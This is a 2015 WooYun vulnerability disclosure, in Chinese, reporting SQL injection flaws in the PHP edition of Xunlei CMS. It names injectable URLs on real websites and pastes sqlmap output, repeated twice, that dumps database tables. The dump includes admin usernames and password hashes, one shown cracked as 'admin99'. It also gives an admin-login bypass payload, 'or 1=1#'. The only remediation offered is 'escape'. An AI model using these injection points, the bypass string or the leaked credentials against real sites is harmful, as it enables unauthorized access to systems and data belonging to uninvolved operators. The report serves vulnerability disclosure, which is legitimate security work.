迅雷CMS#PHP版两处Get注入+Post注入 | wooyun-2015-0103460

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0103460

漏洞标题：

迅雷CMS#PHP版两处Get注入+Post注入

漏洞详情

披露状态：

2015-03-31：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-05-15：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

如题

详细说明：

迅雷cms精选案例
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ 这是个php版的
http://www.ycgjgs.com//news.php?id=475 注入点1
http://www.ycgjgs.com//qynews.php?type=8 注入点2

Database: gongjiaogongsi
Table: 285765338_message
[8 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| data   | text    |
| huifu  | text    |
| id     | int(11) |
| name   | text    |
| ok     | int(11) |
| tel    | text    |
| text   | text    |
| title  | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_news
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| data     | text         |
| id       | int(11)      |
| ly       | text         |
| text     | text         |
| title    | text         |
| titlepic | varchar(100) |
| type     | text         |
| voidurl  | varchar(255) |
| zz       | text         |
+----------+--------------+
Database: gongjiaogongsi
Table: 285765338_dy
[5 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| id     | int(11) |
| text   | text    |
| title  | text    |
| type   | text    |
| typp   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_zp
[13 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| gwyq   | text    |
| id     | int(11) |
| jzrq   | text    |
| lxfs   | text    |
| nl     | text    |
| rs     | text    |
| xb     | text    |
| xl     | text    |
| yx     | text    |
| zpzw   | text    |
| zwmc   | text    |
| zygl   | text    |
| zyyq   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_admin
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
Database: gongjiaogongsi
Table: 285765338_info
[6 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| foot   | text    |
| id     | int(11) |
| query1 | text    |
| query2 | text    |
| title  | text    |
| url    | text    |
+--------+---------+

Database: gongjiaogongsi
Table: 285765338_admin
[3 entries]
+----------+--------------------------------------------+
| username | password                                   |
+----------+--------------------------------------------+
| admin    | 3578ff997a31c61033122d17322858bd           |
| admin1   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
| admin2   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
+----------+--------------------------------------------+
[15:27:44] [WARNING] table 'gongjiaogongsi.`285765338_admin`' dumped to CSV file
 'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com\dump\gon
gjiaogongsi\285765338_admin-62da74f4.csv'
[15:27:44] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.ycgjgs.com'
[*] shutting down at 15:27:44

# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台

账号'or 1=1# 密码随意

漏洞证明：

Database: gongjiaogongsi
Table: 285765338_message
[8 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| data   | text    |
| huifu  | text    |
| id     | int(11) |
| name   | text    |
| ok     | int(11) |
| tel    | text    |
| text   | text    |
| title  | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_news
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| data     | text         |
| id       | int(11)      |
| ly       | text         |
| text     | text         |
| title    | text         |
| titlepic | varchar(100) |
| type     | text         |
| voidurl  | varchar(255) |
| zz       | text         |
+----------+--------------+
Database: gongjiaogongsi
Table: 285765338_dy
[5 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| id     | int(11) |
| text   | text    |
| title  | text    |
| type   | text    |
| typp   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_zp
[13 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| gwyq   | text    |
| id     | int(11) |
| jzrq   | text    |
| lxfs   | text    |
| nl     | text    |
| rs     | text    |
| xb     | text    |
| xl     | text    |
| yx     | text    |
| zpzw   | text    |
| zwmc   | text    |
| zygl   | text    |
| zyyq   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_admin
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
Database: gongjiaogongsi
Table: 285765338_info
[6 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| foot   | text    |
| id     | int(11) |
| query1 | text    |
| query2 | text    |
| title  | text    |
| url    | text    |
+--------+---------+

Database: gongjiaogongsi
Table: 285765338_admin
[3 entries]
+----------+--------------------------------------------+
| username | password                                   |
+----------+--------------------------------------------+
| admin    | 3578ff997a31c61033122d17322858bd           |
| admin1   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
| admin2   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
+----------+--------------------------------------------+
[15:27:44] [WARNING] table 'gongjiaogongsi.`285765338_admin`' dumped to CSV file
 'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com\dump\gon
gjiaogongsi\285765338_admin-62da74f4.csv'
[15:27:44] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.ycgjgs.com'
[*] shutting down at 15:27:44

# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台

账号'or 1=1# 密码随意

修复方案：

转义

版权声明：转载请注明来源浅蓝@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞